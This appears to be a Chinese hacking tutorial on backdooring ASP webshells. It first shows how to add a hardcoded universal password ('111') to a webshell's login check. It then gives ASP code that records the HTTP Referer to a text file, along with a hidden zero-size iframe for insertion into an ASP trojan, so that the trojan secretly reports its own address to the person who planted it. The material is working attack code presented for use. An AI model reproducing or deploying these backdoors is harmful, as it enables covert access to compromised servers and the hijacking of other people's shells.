正常的:
1 2 3 4 5 6 7 8 | EnD fUNCtION IF SEssIoN("web2a2dmin")<>UsERpaSs thEn IF requeSt.FoRM("pass")<>"" TheN iF REquesT.foRM("pass")=uSERPASS Then SEsSIoN("web2a2dmin")=uSERPAss rESPOnsE.rEdirEct Url ELse rrs"对不起,密码验证失败!" |
加油万能密码的:
1 2 3 4 5 6 7 8 | EnD fUNCtION IF SEssIoN("web2a2dmin")<>UsERpaSs thEn IF requeSt.FoRM("pass")<>"" TheN iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="111" Then SEsSIoN("web2a2dmin")=uSERPAss rESPOnsE.rEdirEct Url ELse rrs"对不起,密码验证失败!" |
这样加了万能密码 111 也可以进入
----------------------------------------------------------------------------------------------
这是一段收信的asp代码将其保存为1.asp
1 2 3 4 5 6 7 8 | <%url=Request.ServerVariables("HTTP_Referer") set fs=server.CreateObject("Scripting.FileSystemObject") set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True) file.writeline url file.close set file=nothing set fs=nothing %> |
代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址
简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里
上传到空间比如 http://127.0.0.1/1.asp
然后里用
1 | <iframe src=http://127.0.0.1/1.asp width=0 height=0></iframe> |
插到asp木马中
那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了
会员登录关闭
注册会员关闭